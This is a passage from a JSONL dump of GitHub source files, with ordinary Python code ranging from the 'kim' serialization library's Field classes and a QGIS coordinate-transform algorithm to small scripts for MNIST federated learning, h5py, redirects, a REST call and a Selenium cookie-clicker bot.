Field(object):\n \"\"\"Field, as it's name suggests, represents a single key or 'field'\n inside of your mappings. 
Much like columns in a database or a csv,\n they provide a way to represent different data types when pushing data\n into and out of your Mappers.\n\n A core concept of Kim's architecture is that of Pipelines.\n Every Field makes use of both an Input and Output pipeline which affords users\n a great level of flexibility when it comes to handling data.\n\n Kim provides a collection of default Field implementations;\n for more complex cases, extending Field to create new field types\n couldn't be easier.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n\n id = field.Integer(required=True, read_only=True)\n name = field.String(required=True)\n \"\"\"\n\n #: The :class:`FieldOpts` field config class to use for the Field.\n opts_class = FieldOpts\n\n #: The Fields marshaling pipeline\n marshal_pipeline = MarshalPipeline\n\n #: The Fields serialization pipeline\n serialize_pipeline = SerializePipeline\n\n def __init__(self, *args, **field_opts):\n \"\"\"Constructs a new instance of Field. Each Field accepts a set of\n kwargs that will be passed directly to the field's\n defined :class:`FieldOpts`.\n\n :param args: list of arguments passed to the field\n :param kwargs: keyword arguments typically passed to the FieldOpts class attached\n to this Field.\n :raises: :class:`FieldOptsError`\n :returns: None\n\n .. seealso::\n :class:`FieldOpts`\n \"\"\"\n\n try:\n self.opts = self.opts_class(*args, **field_opts)\n except FieldOptsError as e:\n msg = '{0} field has invalid options: {1}' \\\n .format(self.__class__.__name__, e.message)\n raise FieldError(msg)\n\n set_creation_order(self)\n\n self.marshal_pipes = self.marshal_pipeline.get_pipeline(\n **self.opts.extra_marshal_pipes\n )\n self.serialize_pipes = self.serialize_pipeline.get_pipeline(\n **self.opts.extra_serialize_pipes\n )\n\n def get_error(self, error_type):\n \"\"\"Return the error message for ``error_type`` from the error messages defined on\n the field's opts class.\n\n :param error_type: the key of the error found in self.error_msgs\n :returns: Error message\n :rtype: string\n \"\"\"\n\n parse_opts = {\n 'name': self.name\n }\n return self.opts.error_msgs[error_type].format(**parse_opts)\n\n def invalid(self, error_type):\n \"\"\"Raise an Exception using the provided error_type for the error message.\n This method is typically used by pipes to allow :class:`Field` to control\n how its errors are handled.\n\n Usage::\n\n @pipe()\n def validate_name(session):\n if session.data and session.data != 'Mike Waites':\n raise session.field.invalid('not_mike')\n\n :param error_type: The key of the error being raised.\n :raises: :class:`FieldInvalid`\n\n .. seealso::\n :class:`FieldOpts` for an explanation on defining error messages\n \"\"\"\n\n raise FieldInvalid(self.get_error(error_type), field=self)\n\n @property\n def name(self):\n \"\"\"Proxy access to the :class:`FieldOpts` defined for this field.\n\n :rtype: str\n :returns: The value of get_name from FieldOpts\n :raises: :class:`FieldError`\n\n .. seealso::\n :meth:`kim.field.FieldOpts.get_name`\n \"\"\"\n\n field_name = self.opts.get_name()\n if not field_name:\n cn = self.__class__.__name__\n raise FieldError('{0} requires {0}.name or '\n '{0}.attribute_name.
Please provide a `name` '\n 'or `attribute_name` param to {0}'.format(cn))\n\n return field_name\n\n @name.setter\n def name(self, name):\n \"\"\"Proxy setting the name property via :py:meth:`kim.field.FieldOpts.set_name`\n\n :param name: the value to set against FieldOpts name property\n :returns: None\n\n .. seealso::\n :meth:`kim.field.FieldOpts.set_name`\n \"\"\"\n self.opts.set_name(name)\n\n def marshal(self, mapper_session, **opts):\n \"\"\"Run the marshal :class:`Pipeline` for this field for the given ``data`` and\n update the output for this field inside of the mapper_session.\n\n :param mapper_session: The Mappers marshaling session this field is being\n run inside of.\n :opts: kwargs passed to the marshal pipelines run method.\n :returns: None\n\n .. seealso::\n :meth:`kim.mapper.Mapper.marshal`\n \"\"\"\n\n parent = opts.get('parent_session', None)\n session = Session(\n self, mapper_session.data, mapper_session.output,\n mapper_session=mapper_session,\n parent=parent)\n run_pipeline(self.marshal_pipes, session, self, **opts)\n\n def serialize(self, mapper_session, **opts):\n \"\"\"Run the serialize :class:`Pipeline` for this field for the given `data` and\n update `output` in for this field inside of the mapper_session.\n\n :param mapper_session: The Mappers marshaling session this field is being\n run inside of.\n :opts: kwargs passed to the marshal pipelines run method.\n :returns: None\n\n .. seealso::\n :meth:`kim.mapper.Mapper.serialize`\n \"\"\"\n parent = opts.get('parent_session', None)\n session = Session(\n self, mapper_session.data, mapper_session.output,\n mapper_session=mapper_session,\n parent=parent)\n\n run_pipeline(self.serialize_pipes, session, self, **opts)\n\n\nclass StringFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`String`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`StringFieldOpts`\n and set config options\n\n :param max: Specify the maximum permitted length\n :param min: Specify the minimum permitted length\n :param blank: If False, raise error if empty string passed. 
Default True\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.max = kwargs.pop('max', None)\n self.min = kwargs.pop('min', None)\n self.blank = kwargs.pop('blank', True)\n super(StringFieldOpts, self).__init__(**kwargs)\n\n\nclass String(Field):\n \"\"\":class:`String` represents a value that must be valid\n when passed to str()\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n name = field.String(required=True)\n\n \"\"\"\n opts_class = StringFieldOpts\n marshal_pipeline = StringMarshalPipeline\n serialize_pipeline = StringSerializePipeline\n\n\nclass IntegerFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Integer`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`IntegerFieldOpts`\n and set config options\n\n :param max: Specify the maximum permitted value\n :param min: Specify the minimum permitted value\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.max = kwargs.pop('max', None)\n self.min = kwargs.pop('min', None)\n super(IntegerFieldOpts, self).__init__(**kwargs)\n\n\nclass Integer(Field):\n \"\"\":class:`Integer` represents a value that must be valid\n when passed to int()\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n id = field.Integer(required=True, min=1, max=10)\n\n \"\"\"\n\n opts_class = IntegerFieldOpts\n marshal_pipeline = IntegerMarshalPipeline\n serialize_pipeline = IntegerSerializePipeline\n\n\nclass FloatFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Float`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`FloatFieldOpts`\n and set config options\n\n\n :param precision: Specify the precision of the float\n :param max: Specify the maximum permitted value\n :param min: Specify the minimum permitted value\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.precision = kwargs.pop('precision', 5)\n self.max = kwargs.pop('max', None)\n self.min = kwargs.pop('min', None)\n super(FloatFieldOpts, self).__init__(**kwargs)\n\n\nclass Float(Field):\n \"\"\":class:`Float` represents a value that must be valid\n Float type.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n score = field.Float(precision=4)\n\n \"\"\"\n\n opts_class = FloatFieldOpts\n marshal_pipeline = FloatMarshalPipeline\n serialize_pipeline = FloatSerializePipeline\n\n\nclass Decimal(Float):\n \"\"\":class:`Decimal` represents a value that must be valid\n when passed to decimal.Decimal()\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n score = field.Decimal(precision=4, min=0, max=1.5)\n\n \"\"\"\n\n opts_class = FloatFieldOpts\n marshal_pipeline = DecimalMarshalPipeline\n serialize_pipeline = DecimalSerializePipeline\n\n\nclass BooleanFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Boolean`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\" Construct a new instance of :class:`BooleanFieldOpts`\n and set config options\n\n :param true_boolean_values: Specify an array of values that will validate as\n being 'true' when the field is marshaled.\n :param false_boolean_values: Specify an array of values that will validate as\n being 'false' 
when the field is marshaled.\n\n :raises: :class:`FieldOptsError`\n :returns: None\n \"\"\"\n self.true_boolean_values = \\\n kwargs.pop('true_boolean_values',\n [True, 'true', '1', 1, 'True'])\n self.false_boolean_values = \\\n kwargs.pop('false_boolean_values',\n [False, 'false', '0', 0, 'False'])\n\n super(BooleanFieldOpts, self).__init__(**kwargs)\n self.choices = set(self.true_boolean_values +\n self.false_boolean_values)\n\n\nclass Boolean(Field):\n \"\"\":class:`Boolean` represents a value that must be valid\n boolean type.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n active = field.Boolean(\n required=True,\n true_boolean_values=[True, 'true', 1],\n false_boolean_values=[False, 'false', 0])\n\n \"\"\"\n\n opts_class = BooleanFieldOpts\n marshal_pipeline = BooleanMarshalPipeline\n serialize_pipeline = BooleanSerializePipeline\n\n\nclass NestedFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Nested`.\n\n \"\"\"\n\n def __init__(self, mapper_or_mapper_name, **kwargs):\n \"\"\"Construct a new instance of :class:`NestedFieldOpts`\n\n :param mapper_or_mapper_name: a required instance of a :class:`Mapper`\n or a valid mapper name\n :param role: specify the name of a role to use on the Nested mapper\n :param collection_class: provide a custom type to be used when\n mapping many nested objects\n :param getter: provide a function taking a pipeline session which returns\n the object to be set on this field, or None if it can't find one.\n This is useful where your API accepts simply `{'id': 2}` but you\n want a full object to be set\n :param allow_updates: Allow existing objects returned by the ``getter`` function\n to be updated.\n :param allow_updates_in_place: Whereas allow_updates requires the getter to\n return an existing object which it will then update, allow_updates_in_place\n will make updates to any existing object it finds at the specified key.\n :param allow_create: If the ``getter`` returns None, allow the Nested field to\n create a new instance.\n :param allow_partial_updates: Allow existing object to be updated using a subset\n of the fields defined on the Nested field.\n \"\"\"\n self.mapper = mapper_or_mapper_name\n self.role = kwargs.pop('role', '__default__')\n self.collection_class = kwargs.pop('collection_class', list)\n self.getter = kwargs.pop('getter', None)\n self.allow_updates = kwargs.pop('allow_updates', False)\n self.allow_updates_in_place = kwargs.pop(\n 'allow_updates_in_place', False)\n self.allow_partial_updates = kwargs.pop(\n 'allow_partial_updates', False)\n self.allow_create = kwargs.pop('allow_create', False)\n super(NestedFieldOpts, self).__init__(**kwargs)\n\n\nclass Nested(Field):\n \"\"\":class:`Nested` represents an object that is represented by another\n mapper.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class PostMapper(Mapper):\n __type__ = User\n\n id = field.String()\n name= field.String()\n content = field.String()\n user = field.Nested(\n 'UserMapper',\n role='public',\n getter=user_getter,\n allow_upadtes=False,\n allow_partial_updates=False,\n allow_updates_in_place=False,\n allow_create=False,\n required=True)\n\n .. 
seealso::\n :class:`NestedFieldOpts`\n\n \"\"\"\n\n opts_class = NestedFieldOpts\n marshal_pipeline = NestedMarshalPipeline\n serialize_pipeline = NestedSerializePipeline\n\n def __init__(self, *args, **kwargs):\n\n super(Nested, self).__init__(*args, **kwargs)\n self._mapper_class = None\n\n def get_mapper(self, as_class=False, **mapper_params):\n \"\"\"Retrieve the specified mapper from the Mapper registry.\n\n :param as_class: Return the Mapper class object without\n calling the constructor. This is typically used when nested\n is mapping many objects.\n :param mapper_params: A dict of kwarg's to pass to the specified\n mappers constructor\n\n :rtype: :class:`Mapper`\n :returns: a new instance of the specified mapper\n \"\"\"\n\n from .mapper import get_mapper_from_registry\n\n if self._mapper_class is None:\n mapper = get_mapper_from_registry(self.opts.mapper)\n self._mapper_class = mapper\n\n if as_class:\n return self._mapper_class\n else:\n return self._mapper_class(**mapper_params)\n\n\nclass CollectionFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Collection`.\n\n \"\"\"\n\n def __init__(self, field, **kwargs):\n \"\"\"Construct a new instance of :class:`.CollectionFieldOpts`\n\n :param field: Specify the field type mpapped inside of this collection. This\n may be any :class:`Field` type.\n :param unique_on: Specify a key that is used to check the collection\n for duplicates.\n\n \"\"\"\n self.field = field\n try:\n self.field.name\n except FieldError:\n pass\n else:\n raise FieldError('name/attribute_name/source should '\n 'not be passed to a wrapped field.')\n\n self.field.opts._is_wrapped = True\n self.unique_on = kwargs.pop('unique_on', None)\n super(CollectionFieldOpts, self).__init__(**kwargs)\n\n def set_name(self, *args, **kwargs):\n \"\"\"proxy access to the :class:`FieldOpts` defined for\n this collections field.\n\n :returns: None\n\n \"\"\"\n self.field.opts.set_name(*args, **kwargs)\n super(CollectionFieldOpts, self).set_name(*args, **kwargs)\n\n def get_name(self):\n \"\"\"Proxy access to the :class:`FieldOpts` defined for\n this collections field.\n\n :rtype: str\n :returns: The value of get_name from the collections Field.\n\n \"\"\"\n\n return self.field.name\n\n def validate(self):\n \"\"\"Exra validation for Collection Field.\n\n :raises: FieldOptsError\n \"\"\"\n\n if not isinstance(self.field, Field):\n raise FieldOptsError('Collection requires a valid Field '\n 'instance as its first argument')\n\n\nclass Collection(Field):\n \"\"\":class:`Collection` represents collection of other field types,\n typically stored in a list.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n id = field.String()\n friends = field.Collection(field.Nested('UserMapper', required=True))\n user_ids = field.Collection(field.String())\n\n .. 
seealso::\n :class:`CollectionFieldOpts`\n\n \"\"\"\n\n marshal_pipeline = CollectionMarshalPipeline\n serialize_pipeline = CollectionSerializePipeline\n opts_class = CollectionFieldOpts\n\n\nclass StaticFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Static`.\n\n \"\"\"\n\n def __init__(self, value, **kwargs):\n \"\"\"Construct a new instance of :class:`StaticFieldOpts`\n\n :param value: specify the static value to return when this field\n is serialized.\n\n \"\"\"\n self.value = value\n super(StaticFieldOpts, self).__init__(**kwargs)\n self.read_only = True\n\n\nclass Static(Field):\n \"\"\":class:`Static` represents a field that outputs a constant value.\n\n This field is implicitly read_only and therefore is typically only used\n during serialization flows.\n\n Usage::\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n id = field.String()\n object_type = field.Static(value='user')\n \"\"\"\n opts_class = StaticFieldOpts\n serialize_pipeline = StaticSerializePipeline\n\n\nclass DateTimeFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`DateTime`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Construct a new instance of :class:`DateTimeFieldOpts`\n\n :param format_str: Specify a format string used to validate an\n incoming date string. If not value is passed then the format defaults to\n iso8601.\n\n \"\"\"\n self.date_format = kwargs.pop('format_str', 'iso8601')\n super(DateTimeFieldOpts, self).__init__(**kwargs)\n self.error_msgs['invalid'] = 'Not a valid datetime.'\n\n\nclass DateFieldOpts(FieldOpts):\n \"\"\"Custom FieldOpts class that provides additional config options for\n :class:`Date`.\n\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Construct a new instance of :class:`Date`\n\n :param format_str: Specify a format string used to validate an\n incoming date string. If not value is passed then the format defaults to\n iso8601.\n\n \"\"\"\n self.date_format = kwargs.pop('format_str', '%Y-%m-%d')\n super(DateFieldOpts, self).__init__(**kwargs)\n self.error_msgs['invalid'] = 'Not a valid date.'\n\n\nclass DateTime(Field):\n \"\"\":class:`DateTime` represents an iso8601 encoded date time\n\n .. code-block:: python\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n created_at = field.DateTime(required=True)\n\n \"\"\"\n\n opts_class = DateTimeFieldOpts\n marshal_pipeline = DateTimeMarshalPipeline\n serialize_pipeline = DateTimeSerializePipeline\n\n\nclass Date(DateTime):\n \"\"\":class:`Date` represents a date object\n\n .. 
code-block:: python\n\n from kim import Mapper\n from kim import field\n\n class UserMapper(Mapper):\n __type__ = User\n\n signup_date = field.Date(required=True)\n\n \"\"\"\n\n opts_class = DateFieldOpts\n marshal_pipeline = DateMarshalPipeline\n","repo_name":"mikeywaites/kim","sub_path":"kim/field.py","file_name":"field.py","file_ext":"py","file_size_in_byte":27232,"program_lang":"python","lang":"en","doc_type":"code","stars":319,"dataset":"github-code","pt":"77"} +{"seq_id":"71354994809","text":"\r\ndef read_file_into_list(filename):\r\n lines = []\r\n\r\n file = open(filename, \"r\")\r\n for line in file:\r\n lines.append(int(line))\r\n\r\n return lines\r\n\r\ndef read_intcode(filename):\r\n with open(filename, \"r\") as f:\r\n line = f.read()\r\n line = line.split(',')\r\n ints = [int(x) for x in line]\r\n return ints\r\n","repo_name":"squidgreen/aoc-2019","sub_path":"common/read_fxns.py","file_name":"read_fxns.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19041745392","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('payment', '0010_receiptdata'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='receiptdata',\n name='remarks',\n field=models.TextField(null=True, blank=True),\n ),\n ]\n","repo_name":"bkawan/manutd.org.np","sub_path":"apps/payment/migrations/0011_receiptdata_remarks.py","file_name":"0011_receiptdata_remarks.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74056986488","text":"# future statements like these are kept for backwards compability\n# which I am not sure make much sense since python 3.5 is needed for tensorflow\n#from __future__ import absolute_import, division, print_function, unicode_literals\n\n# TensorFlow and keras\nimport tensorflow as tf\nfrom tensorflow import keras\n\n# Helper libraries\nimport numpy as np\n\ngraph = tf.get_default_graph()\n\nclass Device:\n def __init__(self, device_id):\n self.id = device_id\n self.round_ready = False\n self.ready = False\n self.weights = None\n\n self.X_train = None\n self.y_train = None\n\n\nclass Federation:\n def __init__(self, fed_id=0):\n self.id = fed_id\n self.model = None\n self.global_weights = None\n\n self.load_mnist_dataset()\n self.instantiate_model()\n\n self.device_id = 0\n self.connected_devices = []\n\n self.first_round = True\n self.ready = False\n\n def __str__(self):\n return \"Federation id: \" + str(self.id) + \"\\nmodel: \\n\" + self.model.to_json()\n\n def connect_device(self):\n device = Device(self.device_id)\n self.connected_devices.append(device)\n self.device_id += 1\n return (self.device_id - 1)\n\n def set_fed_ready(self):\n self.ready = True\n # initate the data for the devices\n n_devices = len(self.connected_devices)\n points_per_device = 60000 // n_devices\n points_per_device = 2000\n n_points = n_devices * points_per_device\n\n self.X_used = self.X_train[:n_points]\n self.y_used = self.y_train[:n_points]\n\n self.X_list = [ X.tolist() for X in np.split(self.X_used, n_devices) ]\n self.y_list = [ y.tolist() for y in np.split(self.y_used, n_devices) ]\n\n def load_mnist_dataset(self):\n digits_mnist = keras.datasets.mnist\n\n (self.X_train, self.y_train), (self.X_test, self.y_test) = digits_mnist.load_data()\n self.X_train = 
self.X_train / 255.0\n self.X_test = self.X_test / 255.0\n\n #self.X_send = self.X_train[:5000]\n #self.y_send = self.y_train[:5000]\n\n #self.send2 = {}\n #self.send2['X_train'] = self.X_send.tolist()\n #self.send2['y_train'] = self.y_send.tolist()\n #self.send2 = \"sd\"\n #self.send = [ (X.tolist(), y.tolist()) for X, y in zip(self.X_send, self.y_send) ]\n\n\n def instantiate_model(self):\n self.model = keras.Sequential([\n keras.layers.Flatten(input_shape=(28, 28)),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(128, activation=tf.nn.relu),\n keras.layers.Dense(10, activation=tf.nn.softmax)\n ])\n self.model.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n def get_model_config(self):\n return self.model.to_json()\n\n def set_random_weights(self):\n self.global_weights = self.model.get_weights()\n\n def get_device_data(self, device_id):\n device_id = int(device_id)\n data = {}\n data['X_train'] = self.X_list[device_id]\n data['y_train'] = self.y_list[device_id]\n return data\n\n def aggregate_function(self):\n if all([ device.round_ready for device in self.connected_devices ]):\n global_weights = [ w * 0 for w in self.global_weights]\n for device in self.connected_devices:\n global_weights = [ w1 + w2 for w1, w2 in zip(global_weights, device.weights) ]\n self.global_weights = [ w/len(self.connected_devices) for w in global_weights]\n \n def test_model(self):\n # Train all the device models and the aggregation\n pass\n\nif __name__ == '__main__':\n fed = Federation()\n print(\"Type: \", type(fed.X_train), \"Shape: \", fed.X_train.shape)\n\n","repo_name":"robertcarlsson/federated-learning-system","sub_path":"federation/federation.py","file_name":"federation.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"9107906308","text":"#! /usr/bin/env python3\n\nimport h5py\nimport numpy\n\n# The following example shows how h5py interoperates with numpy arrays.\n# Let us use a dummy numpy array for this purpose. Let us store data using\n# double precision\ndata = numpy.zeros((10, 3), 'f8') # <== This maps a double[10][3] C array in\n # memory\n\n\nwith h5py.File('example.hdf5', 'w') as f:\n # By default the shape and data type of the HDF5 dataset are inferred from\n # the NumPy array (shape, dtype attributes). E.g.\n dataset = f.create_dataset('data', data=data)\n\n # We can override the shape and data type when storing the data to file,\n # E.g. as:\n dataset = f.create_dataset('data_flat_float', data=data,\n shape=(data.size,), # <== Here we store the data\n # flat as a 1d array\n\n dtype='f4') # <== Here we store the data in file\n # using float instead of double\n\n\nwith h5py.File('example.hdf5', 'r') as f:\n dataset = f['data_flat_float'] # <== This is a handle. It does not load the\n # data from file. Data are loaded when\n # accessed\n\n flat_data = numpy.array(dataset,\n dtype='f8') # <== This forces loading the data.\n # In addition we store them\n # back in memory using double\n # precision\n\n data = flat_data.reshape((10, 3)) # <== This restores the initial shape.\n # Note that is does not copy the data!\n # Only the way there are accessed is\n # changed. I.e. 
flat_data and data\n # refer to the same memory\n\nprint(data)\nflat_data[3] = 1\nprint(data[1,0])\n","repo_name":"grand-mother/h5py-examples","sub_path":"examples/format.py","file_name":"format.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"5547844526","text":"import csv\nfrom pathlib import Path\nimport shutil\n\n# Empty the output directory\ndocs_dir = Path('docs/')\nshutil.rmtree(docs_dir, ignore_errors=True)\ndocs_dir.mkdir()\n\n# Load the redirects that need to be created\nwith open('redirects.csv') as f:\n reader = csv.reader(f)\n redirects = [\n # Change the from_url into an appropriate local path\n (from_url.lstrip('/'), to_url) if from_url.endswith('.html')\n # For directories, add an index.html\n else ('index.html', to_url) if from_url == '/'\n else (from_url.strip('/') + '/index.html', to_url)\n for (from_url, to_url) in reader\n ]\n\n# Create the redirect files\nhtml_template = \"\"\"\n\n \n \n Redirecting to {to_url}\n \n \n \n \n This page has moved to {to_url}.\n \n\"\"\"\n\nfor from_url, to_url in redirects:\n print(from_url, to_url)\n\n # Create any necessary folders\n output_file = docs_dir / from_url\n output_dir = output_file.parent\n output_dir.mkdir(parents=True, exist_ok=True)\n\n # Output a formatted template\n with open(output_file, 'w') as f:\n f.write(html_template.format(to_url=to_url))\n","repo_name":"jean-golding-institute/jean-golding-institute.github.io","sub_path":"generate_redirects.py","file_name":"generate_redirects.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3223829896","text":"import requests\n\nheaders = {\n 'BQAPPTOK': '{BQAPPTOK}',\n 'BQMODTOK': '{BQMODTOK}',\n}\npayload = {\n 'initialDate': '2018-01-01',\n 'limit': '10',\n 'users': 'ivan@beepquest.com,fernando@hellodave.mx',\n}\nr = requests.get('{url_api}/v1/question-module-answers'.format(\n url_api='http://api.beepquest.com'\n), headers=headers, params=payload)\n\nprint(r.json())\n","repo_name":"BeepQuest/api","sub_path":"samples/python3/get_module_answers.py","file_name":"get_module_answers.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15018099816","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nVariable-Width Vertex-Wise Buffer\n\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. 
*\n* *\n***************************************************************************\n\"\"\"\n\nfrom qgis.core import ( # pylint:disable=import-error,no-name-in-module\n QgsExpression,\n QgsExpressionContextScope,\n QgsFeature,\n QgsLineString,\n QgsPoint,\n QgsProcessing,\n QgsProcessingException,\n QgsProcessingFeatureBasedAlgorithm,\n QgsProcessingParameterEnum,\n QgsProcessingParameterExpression,\n QgsWkbTypes\n)\n\nfrom ..metadata import AlgorithmMetadata\n\nclass TransformCoordinateByExpression(AlgorithmMetadata, QgsProcessingFeatureBasedAlgorithm):\n \"\"\"\n Transform Z or M coordinate using an expression that is evaluated for each input vertex.\n\n The expression can include coordinates, and other fields values :\n - var('x') : vertex X coordinate\n - var('y') : vertex Y coordinate\n - var('z') : vertex Z coordinate\n - var('m') : vertex M coordinate\n - var('vertex') : vertex index\n \"\"\"\n\n METADATA = AlgorithmMetadata.read(__file__, 'TransformCoordinateByExpression')\n\n EXPRESSION = 'EXPRESSION'\n STORE = 'STORE'\n\n STORE_M = 0\n STORE_Z = 1\n\n def initParameters(self, configuration): #pylint: disable=unused-argument,missing-docstring\n\n self.addParameter(QgsProcessingParameterExpression(\n self.EXPRESSION,\n self.tr('Expression'),\n parentLayerParameterName='INPUT',\n defaultValue=\"var('vertex')\"))\n\n # self.addParameter(QgsProcessingParameterString(\n # self.EXPRESSION,\n # self.tr('Expression'),\n # defaultValue='vertex'))\n\n self.addParameter(QgsProcessingParameterEnum(\n self.STORE,\n self.tr('Store Result In'),\n options=[self.tr(option) for option in ['M', 'Z']],\n defaultValue=0))\n\n def inputLayerTypes(self): #pylint: disable=no-self-use,missing-docstring\n return [QgsProcessing.TypeVectorLine]\n\n def outputName(self): #pylint: disable=missing-docstring\n return self.tr('Transformed')\n\n def outputWkbType(self, inputWkbType): #pylint: disable=no-self-use,unused-argument,missing-docstring\n return QgsWkbTypes.LineStringZM\n\n def supportInPlaceEdit(self, layer): #pylint: disable=unused-argument,no-self-use,missing-docstring\n return False\n\n def prepareAlgorithm(self, parameters, context, feedback): #pylint: disable=unused-argument,missing-docstring\n\n store = self.parameterAsInt(parameters, self.STORE, context)\n\n self.vertex_scope = QgsExpressionContextScope()\n\n for variable in ('x', 'y', 'z', 'm', 'vertex'):\n var = QgsExpressionContextScope.StaticVariable(\n variable, 0.0,\n readOnly=False,\n isStatic=False)\n self.vertex_scope.addVariable(var)\n context.expressionContext().appendScope(self.vertex_scope)\n\n self.store_m = (store == self.STORE_M)\n\n # context.setExpressionContext(self.expression_context)\n\n self.expression = QgsExpression(self.parameterAsExpression(parameters, self.EXPRESSION, context))\n if self.expression.hasParserError():\n feedback.reportError(self.expression.parserErrorString())\n return False\n\n self.expression.prepare(context.expressionContext())\n\n return True\n\n def transform(self, geometry, context):\n \"\"\"\n Evaluate input expression for each vertex,\n and store the result into M coordinate.\n Returns QgsLineString\n \"\"\"\n\n vertices = list()\n\n for i, vertex in enumerate(geometry.vertices()):\n\n self.vertex_scope.setVariable('x', vertex.x())\n self.vertex_scope.setVariable('y', vertex.y())\n self.vertex_scope.setVariable('z', vertex.z())\n self.vertex_scope.setVariable('m', vertex.m())\n self.vertex_scope.setVariable('vertex', i)\n\n value = self.expression.evaluate(context.expressionContext())\n if 
self.expression.hasEvalError():\n raise QgsProcessingException(\n self.tr('Evaluation error: {0}').format(self.expression.evalErrorString()))\n\n if self.store_m:\n vertices.append(QgsPoint(vertex.x(), vertex.y(), vertex.z(), value))\n else:\n vertices.append(QgsPoint(vertex.x(), vertex.y(), value, vertex.m()))\n\n return QgsLineString(vertices)\n\n def processFeature(self, feature, context, feedback): #pylint: disable=no-self-use,unused-argument,missing-docstring\n\n features = []\n\n for geometry in feature.geometry().asGeometryCollection():\n new_geometry = self.transform(geometry, context)\n new_feature = QgsFeature()\n new_feature.setAttributes(feature.attributes())\n new_feature.setGeometry(new_geometry)\n features.append(new_feature)\n\n return features\n","repo_name":"tramebleue/fct-qgis","sub_path":"fct/algorithms/vector/TransformCoordinateByExpression.py","file_name":"TransformCoordinateByExpression.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"21874159366","text":"class Solution:\n def partition(self, nums, l, r):\n k = random.randint(l, r)\n pivot = nums[k]\n nums[l], nums[k] = nums[k], nums[l]\n index = l\n for i in range(l + 1, r + 1):\n if nums[i] > pivot:\n index += 1\n nums[i], nums[index] = nums[index], nums[i]\n nums[l], nums[index] = nums[index], nums[l]\n return index\n\n def findKthLargest(self, nums: List[int], k: int) -> int:\n l, r, k = 0, len(nums) - 1, k - 1\n while 1:\n p = self.partition(nums, l, r)\n if p == k:\n return nums[p]\n elif p > k:\n r = p - 1\n else:\n l = p + 1\n","repo_name":"decoin/leetcode","sub_path":"0215. 数组中的第K个最大元素/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32177133797","text":"from selenium import webdriver\r\nimport time\r\n\r\nchrome_driver_path = \"D:/Pycharm Projects/chromedriver.exe\"\r\ndriver = webdriver.Chrome(executable_path=chrome_driver_path)\r\n\r\ndriver.get(\"http://orteil.dashnet.org/experiments/cookie/\")\r\ncookie = driver.find_element_by_id(\"cookie\")\r\n\r\ntimeout = time.time() + 5\r\nfive_min = time.time() + 5*60\r\n\r\nbuy = {\r\n 7: \"buyTime machine\",\r\n 6: \"buyPortal\",\r\n 